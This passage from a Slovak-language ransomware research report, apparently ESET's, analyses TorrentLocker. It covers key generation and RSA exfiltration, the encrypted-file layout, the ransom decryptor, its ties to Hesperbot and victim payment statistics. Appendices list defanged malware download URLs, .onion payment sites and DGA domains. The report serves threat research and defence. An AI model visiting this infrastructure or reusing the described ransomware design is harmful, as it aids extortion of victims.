6. GetShellWindow
7. GetCapture
8. GetClipboardOwner
9. GetOpenClipboardOwner
10. GetFocus
11. GetActiveWindow
12. GetKBCodePage
13. GetProcessHeap
14. GetThreadTimes(GetCurrentThread())
15. GetProcessTimes(GetCurrentProcess())
Aj keď niektoré z bajtov v tomto 120-bajtovom jadre je možné uhádnuť, je tu príliš veľa neznámych, aby bolo možné násilím prelomiť jadro a pokúsiť sa vygenerovať rovnaký kľúč.
IV používané pre AES-256 bolo rovnaké pre všetky binárne kódy TorrentLockera. Je uvedené v Prílohe F.
19
TorrentLocker
Exfiltrácia kľúča
Predtým, ako sa súbory zašifrujú, kľúč sa zašifruje verejným, 2048-bitovým verejným kľúčom RSA, ktorý je súčasťou TorrentLockera, ktorý sa potom odošle do C&C servera s typom požiadavky nastaveným na 1. V príkladoch malvéru je kľúč zakódovaný DER vo formáte PKCS#1 RSAPublicKey. PKCS#1 OAEP sa používa ako výplň.
Formát zašifrovaného súboru
Ako nahlásil NIXU [9], TorrentLocker zašifruje iba prvé 2 MB súboru. Toto je pravdepodobne voľba autora malvéru z dôvodov výkonu. Zašifrovanie prvých 2 MB vo väčšine prípadov aj tak spôsobí, že súbor je nepoužiteľný.
Na konci zašifrovaného súboru sa pridávajú tri položky:
Tabuľka č. 5. Štruktúra pridaná za obsah zašifrovaného súboru.
Veľkosť Obsah4-bajtové číslo Kontrolný súčet Adler-32 kľúča AES-256.
4-bajtové číslo Veľkosť kľúča zašifrovaného RSA (pravdepodobne 256)
n bajtov Kľúč AES-256 zašifrovaný verejným kľúčom RSA TorrentLockera
Kontrolný súčet Adler-32 bol pravdepodobne pridaný, aby umožnil určité overenie kľúča AES a potvrdenie, že súbor bol skutočne zašifrovaný TorrentLockerom.
Tento spôsob ponechania kľúča AES v zašifrovanom súbore umožňuje prevádzkovateľom TorrentLockera, príp. komukoľvek so súkromným kľúčom RSA, dešifrovať obsah súboru. Poskytuje spôsob na získanie kľúča AES dokonca aj v prípade zlyhania C&C servera. Tento súkromný kľúč je však v rukách páchateľov. Získanie tohto súkromného kľúča by umožnilo vytvorenie generického dešifrovacieho softvéru.
20
TorrentLocker
6. ANALÝZA DEŠIFROVACIEHO SOFTVÉRUAnalytikom spoločnosti ESET sa podarilo analyzovať dešifrovací softvér predávaný gangom prostredníctvom prístupu na platobné stránky obetí, ktoré zaplatili za softvér (pozrite si časť Metodológia). Tento dešifrovací softvér nie je vôbec mätúci. Veľa kódu zdieľa so samotným ransomvérom. Zároveň pre potreby šifrovania používa LibTomCrypt.
Obrázok č. 12: Snímka obrazovky dešifrovacieho softvéru.
V rámci jednej kampane je kód vo vnútri dešifrovacieho softvéru rovnaký pre všetkých. Ako je možné vidieť na nasledujúcej snímke obrazovky, jediným rozdielom je 32-bajtový kľúč AES-256 použitý na dešifrovanie dokumentov.
Obrázok č. 13. Kľúče AES nie sú jediným rozdielom v dešifrovacom softvéri, ktorý zločinci šíria.
Keďže kľúč AES je jedinečný pre každú infekciu, nie je možné použiť rovnakú kópiu dešifrovacieho softvéru pre dva rozdielne infikované počítače.
21
TorrentLocker
7. PODOBNOSŤ S BANKOVÝM TRÓJSKYM KOŇOM HESPERBOTHesperbot objavili analytici ESETu v roku 2013. Je to bankový trójsky kôň schopný injektovania javascriptu a HTML do webových stránok. Jeho hlavným cieľom je krádež bankových údajov. Obsahuje tiež komponent pre Android na zachytávanie jednorazových hesiel (OTP), ktoré používajú určité banky. Dokument o Hesperbote je k dispozícii online na našom blogu welivesecurity.com.
Počas nášho vyšetrovania TorrentLockera sme zistili, že tieto dve hrozby sú veľmi podobné. V skutočnosti to vyzerá tak, že autorom a prevádzkovateľom je jedna a tá istá skupina. Okrem toho, že cieľom sú rovnaké krajiny (hlavne Turecko, Česká republika a Austrália), sú tu aj iné stopy, ktoré naznačujú, že oba spolu súvisia.
7.1 Podobnosť stránok určených na šírenie malvéruWebové stránky používané na šírenie Hesperbotu na začiatku roku 2014 boli podobné tým, ktoré na šírenie používa TorrentLocker. V marci toho roku, MRG Effitas [20] uverejnil blogový príspevok o stránke na stiahnutie s obrázkom CAPTCHA, používanej na šírenie Hesperbotu. Je veľmi nezvyčajné používať na šírenie malvéru stránku s obrázkom CAPTCHA. URL adresy tiež vykazujú určitý vzorec, v niektorých prípadoch končiaci na .php?id=[digits].
Distribuuje TorrentLockerDistribuuje Hesperbot
Obrázok č. 14: Porovnanie URL adries stránok.
V oboch prípadoch bol stiahnutý .zip súbor obsahujúci škodlivý spustiteľný súbor. Názov .zip súboru má rovnaký vzor: [word]_[digits].zip.
Páchatelia tiež napodobňujú TTNet, obľúbenú telekomunikačnú stránku v oboch [19] prípadoch [Príloha A].
7.2 Opätovné použitie C&C serveraVo svojom blogovom príspevku [20], MRG Effitas tiež zverejnil adresu C&C servera pre Hesperbot, updatesecurehost1.ru, ktorá je 46.149.111.178. Čo je zaujímavé, táto IP adresa bola tiež použitá ako C&C server pre TorrentLocker v septembri 2014. Príklady obsahujú URL adresu s doménou nigerianpride.net, ktorou v tom čase bola 46.149.111.178.
22
TorrentLocker
7.3 Cesta k súboru PDBV oboch skupinách malvéru, prvotné verzie ukazujú cestu k súboru PDB (Program Database, používa sa pre informácie o odstraňovaní porúch) po jeho rozbalení. Cestu k súboru PDB pre Hesperbot našiel Peter Kleissner a zverejnil ju na Twitter v novembri 2013. Cesta k PDB súboru pre modul „procblock“ pre Hesperbot bola nasledujúca:
X:\hesperus\solution\v3_pdf_err\output\mods\Release\procblock_mod_x86.pdb
V auguste 2014 analytici ESETu skúmali vzorku, ktorá vykazovala veľmi podobnú cestu k súboru PDB. Táto vzorka obsahovala nasledujúcu cestu pre modul jadra TorrentLockera:
X:\racketeer\solutions\new\output\Release\bin\rack-core.pdb
Iné vzorky tiež vykazovali iný binárny kód nazvaný rack-dropper:
X:\racketeer\solutions\new\output\Release\rack-dropper.pdb
Prítomnosť toho, čo vyzerá ako projekty Visual Studio v koreni disku X, nie je ničím bežným. I keď je možné, že dvaja rozdielni autori malvéru použili rovnakú cestu, tieto zistenia predpokladajú, že obidva malvéry boli zostavené na rovnakom stroji.
23
TorrentLocker
8. ŠTATISTIKAKeď sme zistili, ako sa generujú používateľské kódy (pozrite si Generovanie identifikačného kódu obete), analytici ESETu dokázali vytiahnuť informácie o obetiach z C&C serverov TorrentLockera.
8.1 MetodológiaNižšie sú uvedené kroky, ktoré sme podnikli, aby sme získali platobné stránky z C&C serverov:
1. Poslanie požiadavky „Získať stránku na výkupné“ do C&C servera spolu s menom náhodného počítača
1. Rozbalenie používateľského kódu zo stránky
1. Rozbalenie identifikácie používateľa z používateľského kódu
1. Žiadosť o všetky platobné stránky s identifikáciou používateľa nižšou ako tá, ktorú sme dostali
Tento experiment prebehol 24. novembra 2014. Rozhodli sme sa použiť všetky domény .onion, ktoré sme našli na stránkach s výkupným. Spoločné použitie domény .onion a používateľského kódu je vlastne spôsob, akým prevádzkovateľ TorrentLockera dokáže jedinečne identifikovať svoje obete, takže to bol najlepší spôsob na získanie čo najlepšieho pokrytia. Tu je zoznam C&C serverov:
Tabuľka č. 6. Zoznam serverov C&C kontaktovaných v rámci experimentu.
Doména .onion Dátum prvého videnia
Získaný používateľský kód
Používateľský kód dekódovaný Base 36
Identifikácia používateľa
4ptyziqllh5iyhx4.onion 20. november 2014
3fcyy0 207197928 2071
tisoyhcp2y52ioyk.onion 12. november 2014
12m8so9 2335076649 23350
nne4b5ujqqedvrkh.onion 25. september 2014
bgaj2r 692493075 6924
erhitnwfvpgajfbu.onion 29. august 2014 Rovnaký výsledok ako nne4b5ujqqedvrkh.onion
a5xpevkpcmfmnaew.onion 18. november 2014
23fld9 126698733 1266
3v6e2oe5y5ruimpe.onion 17. november 2014
mqxfz9 1375486245 13754
udm744mfh5wbwxye.onion 6. august 2014 Nefunkčná
iet7v4dciocgxhdv.onion 31. júl 2014 Nefunkčná
8.2 VýsledkyAnalytici ESETu si vyžiadali celkom 47 365 platobných stránok z 5 rozdielnych C&C serverov. Z tohto celkového počtu, 39 670 stránok boli platné používateľské kódy vygenerované úspešným infikovaním s platobnými informáciami alebo prepojením na stiahnutie dešifrovacieho softvéru v prípade, že obeť zaplatila výkupné. Ostatné používateľské kódy mohli z databázy vymazať prevádzkovatelia, pretože sú príliš staré, alebo z dôvodu, že neboli výsledkom skutočného infikovania (napr. používateľské kódy vytvorené analytikom malvéru).
Z celkového počtu 39 670 obetí, 570 zaplatilo výkupné a dostalo odkaz na dešifrovací softvér. Inými slovami, 1,44 % infikovaných používateľov, ktorých sme identifikovali, zaplatilo kybernetickým
24
TorrentLocker
zločincom výkupné. 20 stránok tiež ukazuje, že bitcoiny boli odoslané ale prístup na dešifrovací softvér nebol poskytnutý z dôvodu, že nebola uhradená plná suma.
Zaplatené
Nezaplatené
Čiastočne zaplatené
Obrázok č. 15: Pomer obetí, ktoré kybernetickým zločincom zaplatili za dešifrovací softvér.
Platobná stránka sa prispôsobuje krajine obeti. Jazyk, mena a tiež prepojenia na trh s bitcoinmi sú rozdielne. Boli zistené vzory na celkovo 13 rozdielnych krajín. V niektorých krajinách boli kampane na šírenie veľmi úspešné a v niektorých krajinách bolo zaznamenaných iba niekoľko infikovaní.
Španielsko
Neznáme
Holandsko
Veľká Británia
Česká republika
Taliansko
Austrália
Rakúsko
Turecko
Kanada
Írsko
Nový Zéland
Nemecko
Francúzsko
Obrázok č. 16: Počet infekcií podľa krajín.
25
TorrentLocker
1 777 „neznámych“ stránok je v anglickom jazyku a neobsahujú žiadne informácie špecifické pre určitú krajinu, týkajúce sa nákupu bitcoinov. Vyzerá to tak, že generická stránka, ktorá sa používa na šírenie, sa nezameriava cielene na určitú krajinu.
Platobná stránka zobrazuje obeti dve rozdielne ceny: môžu zaplatiť buď polovičnú sumu v prípade, že je výkupné uhradené do určitého času, alebo plnú sumu, ak sa obeť rozhodne zaplatiť po uvedenom termíne. Doba platnosti tejto „zľavy“ sa pohybuje medzi 2-4 dňami a pri každej kampani je iná.
Plná suma výkupného, požadovaná na odšifrovanie súborov, sa pohybuje medzi 2,0264 BTC a 4,0810 BTC Suma sa zrejme mení v závislosti na hodnote bitcoinov v momente spúšťania kampane, príp. v závislosti na iných faktoroch. Zároveň sme si všimli, že kampaň, v rámci ktorej sa žiada výkupné, nie je vždy rovnaká. Tu napríklad uvádzame 10 po sebe idúcich infikovaní:
Tabuľka č. 7. Podrobné údaje desiatich, po sebe idúcich platobných stránok, z jedného C&C servera.
ID Krajina Výkupné (BTC) Výkupné (peniaze)i Turecko 2,8589 BTC 2599 TRYi+1 Turecko 1,9789 BTC 1799 TRYi+2 Turecko 2,4189 BTC 2199 TRYi+3 Turecko 2,8589 BTC 2599 TRYi+4 Turecko 1,9789 BTC 1799 TRYi+5 Turecko 2,4189 BTC 2199 TRYi+6 Turecko 2,8589 BTC 2599 TRYi+7 Turecko 1,9789 BTC 1799 TRYi+8 Turecko 2,4189 BTC 2199 TRYi+9 Turecko 2,8589 BTC 2599 TRY
Je možné, že prevádzkovatelia TorrentLockera sa pokúšajú zistiť tú správnu sumu, ktorú si od obetí požadovať, aby maximalizovali svoj príjem.
Pre všetkých 39 100 obetí, ktoré výkupné neuhradili, je priemerná požadovaná suma 1,334 BTC v prípade zaplatenia v rámci zľavy, potom je cena 2,688 BTC.
Je ťažké uviesť, kto zaplatil plnú sumu a kto zľavnenú (polovičnú) sumu. Z tohto dôvodu sme sa rozhodli použiť rozsah, aby sme dokázali kvantifikovať zisk páchateľov. Celková suma v bitcoinoch sa pohybuje v rozmedzí 760,38 – 1520,76 BTC. Pri hodnote bitcoinu dňa 29. novembra 2014 (1 BTC = 384,94 dolára) to znamená, že svoje obete pripravili o sumu v rozmedzí 292 700 – 585 401 dolárov.
Platobné stránky nedávnych infikovaní obsahovali dobu, ktorá zostávala do vypršania zľavy, a zvýšenie ceny. Zistili sme, že bolo 2766 stránok, kde zostávajúci čas bol vyšší ako nula. Maximálny zostávajúci čas zo stránok bol takmer presne štyri dni. Bolo to pravdepodobne veľmi nedávne infikovanie a myslíme si, že je bezpečné predpokladať, že štyri dni je čas poskytnutý na zaplatenie polovičnej ceny. Na záver je možné uviesť, že týchto 2766 obetí bolo infikovaných medzi 20. -24. novembrom 2014, čo počas tohto obdobia predstavuje 691,5 infikovaní denne.
TorrentLocker nahlasuje C&C serveru počet súborov, ktoré zašifroval. Táto informácia nám umožnila určiť celkový počet zašifrovaných súborov, ktorý ku 24. novembru 2014 predstavuje číslo až 284 716 813.
26
TorrentLocker
9. ZÁVERGang prevádzkujúci TorrentLocker šíri tento ransomvér minimálne od februára 2014. Tým, že obetiam zabránili prístup k ich dokumentom, získali neuveriteľné množstvo bitcoinov. Doteraz to vyzerá tak, že príslušné orgány nedokážu toto „podnikanie“ zastaviť. Presunom z AES v režime CTR na AES v režime CBC podstatne sťažili dešifrovanie bez AES kľúča. Získanie súkromného kľúča RSA od prevádzkovateľov by predstavovalo získanie schopnosti rozbaliť AES z akéhokoľvek zašifrovaného súboru. Pomocou tejto informácie by bolo možné vytvoriť generický nástroj na dešifrovanie.
Jedným spôsobom, ako vyliečiť Torrent Locker, je mať offline zálohu. TottentLocker nedokáže upravovať obsah súborov, ktoré nie sú pripojené k infikovanému zariadeniu. Je však potrebné uvedomiť si, že ak je vaša záloha permanentne pripojená k počítaču, alebo na sieťovom disku, ktorý je kedykoľvek pripojiteľný, malvér taktiež zakóduje jeho obsah.
Stále je treba odpovedať na množstvo otázok týkajúcich sa toho, ako gang funguje v pozadí: Predáva niekto balíček „Racketeer“ iným, ktorí prevádzkujú botnet, alebo oni sami sú autormi a sami ho aj prevádzkujú? Jedná sa o vedľajší projekt spájaný s autormi Hesperbotu? Získavajú peniaze obidva naraz alebo sa presunuli iba na TorrentLocker? Prináša tento šírený ransomvér viac zisku ako bankový trójsky kôň?
27
TorrentLocker
10. POĎAKOVANIEĎakujeme Thomasovi Dupuyovi za jeho pomoc pri analýze TorrentLockera.
11. ODKAZYBlogové príspevky týkajúce sa TorrentLockera v chronologickom poradí
• [1] 2014-02-20, Osman Pamuk, Emir Üner and Alican Akyo (TÜBİTAK BİLGEM), Kripto kilit yöntemini kullanan şantajcı zararlı yazılım, https://www.bilgiguvenligi.gov.tr/zararli-yazilimlar/kripto-kilit-yontemini-kullanan-santajci-zararli-yazilim.html
• [2] 2014-02-27, rebus, Sifreli Ransomware, http://rebsnippets.blogspot.com/2014/02/sifreli-ransomware.html
• [3] 2014-03-25, samohtc, CAPTCHA protected malware downloader, https://community.emc.com/community/connect/rsaxchange/netwitness/blog/2014/03/25/captcha-protected-malware-downloader
• [4] 2014-05-30, Fred Touchette (App River), New CryptoLocker Has a Walkabout, http://blog.appriver.com/2014/05/new-cryptolocker-has-a-walkabout
• [5] 2014-06-02, Joseph Graziano (Symantec), Energy Bill Spam Campaign Serves Up New Crypto Malware, http://www.symantec.com/connect/blogs/energy-bill-spam-campaign-serves-new-crypto-malware
• [6] 2014-06-03, Michael Jenkin, Cryptolocker (Again, new and improved?), http://blogs.msmvps.com/mickyj/blog/2014/06/03/cryptolocker-again-new-and-improved
• [7] 2014-06-10, Ivo Ivanov (Vínsula), Analysis of CryptoLocker Racketeer spread through fake Energy Australia email bills, http://vinsula.com/2014/06/10/analysis-of-cryptolocker-racketeer
• [8] 2014-08-15, Richard Hummel (iSIGHT Partners), Analysis of ‘TorrentLocker’ – A New Strain of Ransomware Using Components of CryptoLocker and CryptoWall, http://www.iSIGHTpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall
• [9] 2014-09-09, Taneli Kaivola, Patrik Nisén and Antti Nuopponen (Nixu), TorrentLocker Unlocked, http://digital-forensics.sans.org/blog/2014/09/09/torrentlocker-unlocked
• [10] 2014-09-17, Richard Hummel (iSIGHT Partners), TorrentLocker – New Variant with New Encryption Observed in the Wild, http://www.iSIGHTpartners.com/2014/09/torrentlocker-new-variant-observed-wild
• [11] 2014-09-27, Chris Mannon (Zscaler), Crypto-Ransomware Running Rampant, http://research.zscaler.com/2014/10/crypto-ransomware-running-rampant.html
• [12] 2014-10-20, Paolo Dal Checco and Giuseppe Dezzani (Digital Forensics Bureau), TorrentLocker – Enti Italiani sotto riscatto, http://www.difob.it/torrentlocker-cryptolocker-documenti-criptati/
• [13] 2014-10-21, Joost Bijl (Fox-IT), Update on the Torrentlocker ransomware, http://blog.fox-it.com/2014/10/21/update-on-the-torrentlocker-ransomware/
• [14] 2014-10-30, MailGuard, MailGuard Breaking IT News: Fake NSW Office of State Revenue Scam, http://www.mailguard.com.au/blog/mailguard-breaking-it-news-fake-nsw-office-of-state-revenue-scam/
• [15] 2014-11-03, Paul Ducklin, GATSO! Speed camera phish leads to CryptoLocker ransomware clone…, http://nakedsecurity.sophos.com/2014/11/03/gatso-speed-camera-phish-leads-to-cryptolocker-ransomware-clone
• [16] 2014-11-11, Patrick, Crytolocker Ransomware Campaign - Oct/Nov 2014, http://protectyournet.blogspot.com/2014/11/crytolocker-ransomware-campaign-octnov.html
28
TorrentLocker
• [17] 2014-11-14, Osman Pamuk, Alican Akyol (TÜBİTAK BİLGEM), Güncel CryptoLocker Saldırısına Dikkat, https://www.bilgiguvenligi.gov.tr/zararli-yazilimlar/guncel-cryptolocker-saldirisina-dikkat.html
• [18] 2014-11-18, Zemana, Dosyalarınızı şifreleyen telefon faturasına dikkat edin!, http://blog.zemana.com/2014/11/dosyalarnz-sifreleyen-telefon-faturasna.html
Blogové príspevky týkajúce sa Hesperbotu
• [19] 2013-07-26, Emir Üner, Alican Akyol, Onur Samet Özer (TÜBİTAK BİLGEM), Fatura Zararlı Yazılım (DefRef) Analizi, http://www.bilgiguvenligi.gov.tr/zararli-yazilimlar/fatura-zararli-yazilim-defref-analizi.html
• [20] 2014-03-27, Zoltan Balazs (MRG Effitas), Captcha protected malware, https://blog.mrg-effitas.com/captcha-protected-malware/
CryptoLocker
• [21] 2013-12-18, Keith Jarvis (Dell SecureWorks), CryptoLocker Ransomware, http://www.secureworks.com/cyber-threat-intelligence/threats/cryptolocker-ransomware/
• [22] 2014-07-08, Meaghan Molloy (FireEye), Operation Tovar: The Latest Attempt to Eliminate Key Botnets, https://www.fireeye.com/blog/threat-research/2014/07/operation-tovar-the-latest-attempt-to-eliminate-key-botnets.html
29
TorrentLocker
12.PRÍLOHY
Príloha A: Snímky stránok s CAPTCHA, z ktorých sa sťahoval malvér
Obrázok č. 17: DHL - Rakúsko a Nemecko.
Obrázok č. 18: Office of State Revenue – Austrália.
30
TorrentLocker
Obrázok č. 19: Auspost – Austrália
Obrázok č. 20: Česká pošta — Česká republika.
31
TorrentLocker
Obrázok č. 21: TTNet — Turecko.
Obrázok č. 22: Royal Mail — Veľká Británia.
32
TorrentLocker
Obrázok č. 23: SDA — Taliansko.
33
TorrentLocker
Príloha B: Zoznam známych domén, na ktorých sa nachádza stránka, z ktorej sa stiahne malvérZoznamy sú obmedzené na URL adresy pozorované v novembri 2014. Zátvorky ({}) označujú, že na danej stránke sa nachádzalo viacero názvov súborov. Možné názvy súborov sú oddelené čiarkami v zátvorkách.
Stránky s odkazom na stiahnutie obsahujúce CAPTCHA
• hxxp://aupostal24.org• hxxp://correos-online.org• hxxp://cs-posta24.info• hxxp://csposta24.org• hxxp://efatura.ttnet-fatura.biz/• hxxp://efatura.ttnet-fatura.info/• hxxp://efatura.ttnetbilglendirme.com/• hxxp://mysda24.biz• hxxp://mysda24.com
Priame prepojenia na súbor .zip
• hxxp://0160d4a.netsolhost.com/Responder.zip• hxxp://122.155.13.156/{Condition,Details,Payment,Price}.zip• hxxp://abaxsoftware.org/{Condition,Details,Payment,PriceList}.zip• hxxp://accessautoclass.com/Processing.zip• hxxp://ad-ep.com/{Mensaje,Perfil,Responder}.zip• hxxp://administ.hn02.wiroos.com/Saldo.zip• hxxp://agrofert.com.ar/Invoice.zip• hxxp://ameridev.com/Informe.zip• hxxp://animale.com/Condition.zip• hxxp://attorneyjacksonms.com/Informe.zip• hxxp://aurahearingaid.com/{Account,Payment}.zip• hxxp://bariawilliamson.com/{Informe,Mensaje,Perfil,Responder}.zip• hxxp://bbbjewelry.net/Mensaje.zip• hxxp://bedazzlememore.com/{Informe,Mensaje,Responder}.zip• hxxp://beepbike44.fr/{Answer,Contract,Documentation,Invoice,Message}.zip• hxxp://bharatvalley.com/Account.zip• hxxp://bigappleinfotech.com/Processing.zip• hxxp://canonistasargentina.com/Info.zip• hxxp://capitolpestcontrol.com/{Mensaje,Perfil}.zip• hxxp://casadahospedagem.com.br/Invoice.zip• hxxp://centralapplianceservice.com/Informe.zip• hxxp://chapasyherrajesdelbajio.com.mx/Invoice.zip• hxxp://chli.ca/{Answer,Message}.zip• hxxp://consultasas.com/Perfil.zip• hxxp://coolwatercatering.com/{Mensaje,Perfil}.zip• hxxp://crm.opusestates.in/{Account,Invoice,Payment}.zip• hxxp://cybercountrysystems.com/{Informe,Perfil,Responder}.zip• hxxp://desingforbiosafety.com/Processing.zip
34
TorrentLocker
• hxxp://dipneo.com.ar/Invoice.zip• hxxp://docs.majesticcinemas.com.au/Invoice.zip• hxxp://doctoresarceo.com.mx/Payment.zip• hxxp://electriargo.mx/{Info,Processing}.zip• hxxp://enginemanagementsystem.com/Details.zip• hxxp://englishdemo.emonkey.no/Processing.zip• hxxp://ever-move.be/{Account,Payment,Transazione}.zip• hxxp://fastweb011.net/{Mensaje,Responder}.zip• hxxp://foresightinfra.com/Account.zip• hxxp://fromagerie-de-malataverne.fr/Documentation.zip• hxxp://golftoknow.com/{Answer,Contract,Documentation,Message}.zip• hxxp://graniteunlimitedinc.com/Processing.zip• hxxp://gt1004.com/{Documentation,Invoice,Message}.zip• hxxp://helenannobil.com/Fattura.zip• hxxp://hellovizag.com/{Contract,Message}.zip• hxxp://hostvip.com.br/Answer.zip• hxxp://htcladakh.com/Info.zip• hxxp://hukum.ub.ac.id/{Info,Processing}.zip• hxxp://inegolbakkallarodasi.com/Invoice.zip• hxxp://ingentec.co.th/Answer.zip• hxxp://iplbiotech.com/{Details,Payment,PriceList}.zip• hxxp://jjskin.kr/{Condition,Details,PriceList}.zip• hxxp://jmlignon.o2switch.net/Processing.zip• hxxp://kafekaapeh.com/Info.zip• hxxp://kvak.cz/{Info,Processing}.zip• hxxp://la.srv.br/{Answer,Message}.zip• hxxp://laamigo.com/Payment.zip• hxxp://laanimatera.com.ar/{Payment,Price,PriceList}.zip• hxxp://laflammedd.com/{Informe,Mensaje}.zip• hxxp://lahatte.com/Responder.zip• hxxp://laislaconsultora.com.ar/Info.zip• hxxp://lencuthbert.com/Responder.zip• hxxp://littlebluechoo.com/{Mensaje,Perfil}.zip• hxxp://mamchandschool.com/{Account,Invoice}.zip• hxxp://mamhtroso.com/Info.zip• hxxp://merliasfalti.it/{Info,Invoice}.zip• hxxp://messancy.com/{Informe,Perfil,Responder}.zip• hxxp://metrofinish.com/{Account,Info,Invoice}.zip• hxxp://midamdental.com/{Payment,Price,PriceList}.zip• hxxp://msdisabilities.com/Responder.zip• hxxp://msrealestate.com/Perfil.zip• hxxp://mylowprice.net/Contract.zip• hxxp://mytraveladvisor.co.uk/{Condition,Details,Payment,Price}.zip• hxxp://new-line.co.kr/{Condition,Details,Payment,Price}.zip• hxxp://nicolesantivip.com/PriceList.zip• hxxp://ninacucina.com/Responder.zip
35
TorrentLocker
• hxxp://odontoportes.com.br/{Answer,Contract}.zip• hxxp://oelsmeier.homepage.t-online.de/Informe.zip• hxxp://orthoiris.com/Perfil.zip• hxxp://perthanddistrictpipeband.co.uk/{Condition,Price,PriceList}.zip• hxxp://petitrenaud.net/Payment.zip• hxxp://placagesdebois.com/Responder.zip• hxxp://pousadapraiagrande.com/Invoice.zip• hxxp://priceskincareclinic.com/Responder.zip• hxxp://protecnicsrl.com/{Answer,Contract,Documentation}.zip• hxxp://rebatsystems.com/{Informe,Mensaje,Responder}.zip• hxxp://regallaboratories.com/{Invoice,Payment}.zip• hxxp://regoshin.com/Info.zip• hxxp://rehabilitacionescampillo.com/Contract.zip• hxxp://robinsoncarneiro.com/{Documentation,Message}.zip• hxxp://royalhandicraftindia.com/{Contract,Invoice}.zip• hxxp://sereinesolutions.fr/{Contract,Message}.zip• hxxp://shadesofaustralia.net.au/Processing.zip• hxxp://slass.org/{Details,Payment}.zip• hxxp://solarseg.com.br/{Answer,Documentation}.zip• hxxp://solutechnic.com/Condition.zip• hxxp://spellfresh.com.ar/PriceList.zip• hxxp://ssuetcep.com/{Mensaje,Responder}.zip• hxxp://ssumcba.org/{Informe,Perfil,Responder}.zip• hxxp://starnaweb.com.br/{Details,Price}.zip• hxxp://stjosephfarmington.com/Informe.zip• hxxp://stoffels.be/Condition.zip• hxxp://talent-decoration.net/Perfil.zip• hxxp://tibo.andreka.be/Mensaje.zip• hxxp://tluaner.com/{Answer,Contract,Invoice}.zip• hxxp://totalitsolution.co/Answer.zip• hxxp://truehearted.co.uk/Perfil.zip• hxxp://turbul-montessori.fr/PriceList.zip• hxxp://valledelzamudia.es/Price.zip• hxxp://valorpro.net/{Account,Invoice,Payment}.zip• hxxp://vault-dwellers.com/{Informe,Mensaje}.zip• hxxp://vertvonlinebr.net/{Payment,Price}.zip• hxxp://w3solutions.co.in/{Condition,Details}.zip• hxxp://webtosta.com/{Mensaje,Perfil,Responder}.zip• hxxp://whitedayandblacknight.com/{Details,Payment,Price}.zip• hxxp://wulcon.com/{Documentation,Invoice}.zip• hxxp://www.amdexsolutions.co.uk/{Info,Invoice}.zip• hxxp://www.artnportrait.com/{Answer,Contract,Documentation,Invoice}.zip• hxxp://www.avventuroso.eu/{Contract,Documentation,Invoice,Message}.zip• hxxp://www.bscmilano.com/{Contract,Invoice}.zip• hxxp://www.corederoma.net/Invoice.zip
36
TorrentLocker
• hxxp://www.deftcases.com/{Mensaje,Perfil,Responder}.zip• hxxp://www.den-tek.talktalk.net/Processing.zip• hxxp://www.educouncil.in/Account.zip• hxxp://www.etchells.org.au/{Account,Payment}.zip• hxxp://www.gremilletpodiatres.com/{Details,PriceList}.zip• hxxp://www.ica.co.uk/Invoice.zip• hxxp://www.justalittlesomethin.com/{Mensaje,Responder}.zip• hxxp://www.kaffeekonditorei-sami.at/{Mensaje,Responder}.zip• hxxp://www.lolvideos.meximas.com/Answer.zip• hxxp://www.m2kindia.com/{Details,PriceList}.zip• hxxp://www.matematica40-40-20.it/{Answer,Documentation,Invoice}.zip• hxxp://www.maui2020.com/Invoice.zip• hxxp://www.neilacapital.com/Payment.zip• hxxp://www.noghrehpol.ir/Fattura.zip• hxxp://www.papercut-design.com/{Details,Payment,PriceList}.zip• hxxp://www.piranesiexperience.com/Invoice.zip• hxxp://www.quartierdesarts.ca/{Condition,Details,Payment,PriceList}.zip• hxxp://www.sharksmotoclub.it/Account.zip• hxxp://www.tamamotosrus.com/Responder.zip• hxxp://www.tluaner.com/{Answer,Documentation}.zip• hxxp://www.whitedayandblacknight.com/Payment.zip• hxxp://yndcskbaghpat.com/{Info,Invoice,Payment}.zip
37
TorrentLocker
Príloha C: Zoznam známych URL adries .onion, ktoré doručujú informácie o platbe
• hxxp://udm744mfh5wbwxye.onion/buy.php (Nedostupná)• hxxp://iet7v4dciocgxhdv.onion/buy.php (Nedostupná)• hxxp://4ptyziqllh5iyhx4.onion/buy.php• hxxp://tisoyhcp2y52ioyk.onion/buy.php• hxxp://nne4b5ujqqedvrkh.onion/buy.php• hxxp://erhitnwfvpgajfbu.onion/buy.php• hxxp://a5xpevkpcmfmnaew.onion/buy.php• hxxp://3v6e2oe5y5ruimpe.onion/buy.php• hxxp://humapzcmz744fe7y.onion/buy.php• hxxp://bbsqfujyiblsrygu.onion/buy.phg
38
TorrentLocker
Príloha D: Domény v TorrentLocker DGA1. uqelamavolequgiw. com
2. olinezexelinixem. com
3. odoqysigujolonaz. com
4. yhijuvejyzidifem. com
5. ibaminecybakuboj. com
6. asocegymibocamax. com
7. ojymyzutuxifuder. com
8. okamakutucafuvod. com → Dátum vytvorenia: 4. november 20149. opodafydovejevic. com
10. oragekugujapygow. com
11. ajynogurydynakum. com
12. yfaqedovikylizuh. com
13. ywyzedusisiwazel. com
14. ozihesohohysiduq. com
15. urywosoburyzixup. com
16. ucihubuhokizajeg. com
17. ucivysoqokipexew. com
18. isirypenyhiromec. com
19. agyliqepilaqukow. com
20. ypujevarivonamaf. com
21. opifefocegykilud. com
22. ozikemokosycavux. com
23. obumakicubomovad. com
24. iracujumaxatawoj. com
25. ydosyxisajowesap. com
26. adawinehyjazuhoq. com
27. anuseqisyduhycyv. com
28. etyzahubofyzonuq. com
29. upujasijelodunat. com
30. osovihalewogunab. com
39
TorrentLocker
Príloha E: Zoznam typov súborov, ktoré TorrentLocker šifruje
3ds
3fr
3pr
7z
ab4
ac2
accdb
accdb
accde
accdr
accdt
acr
adb
agd1
ai
ait
al
apj
arw
asm
asp
awg
backup
backupdb
bak
bdb
bgt
bik
bkp
blend
bpw
c
cdf
cdr
cdr3
cdr4
cdr5
cdr6
cdrw
cdx
ce1
ce2
cer
cfp
cgm
cib
cls
cmt
cpi
cpp
cr2
craw
crt
crw
csh
csl
css
csv
dac
db
db-journal
db3
dbf
dc2
dcr
dcs
ddd
ddoc
ddrw
der
design
dgc
djvu
dng
doc
docm
docx
dot
dotm
dotx
drf
drw
dwg
dxb
erbsql
erf
exf
fdb
ffd
fff
fh
fhd
fpx
fxg
gray
grey
gry
h
hbk
hpp
ibank
ibd
ibz
idx
iiq
incpas
jpeg
jpg
js
kc2
kdbx
kdc
kpdx
lua
mdb
mdc
mef
mfw
mmw
moneywell
mos
mpg
mrw
myd
ndd
nef
nop
nrw
ns2
ns3
ns4
nsd
nsf
nsg
nsh
nwb
nx1
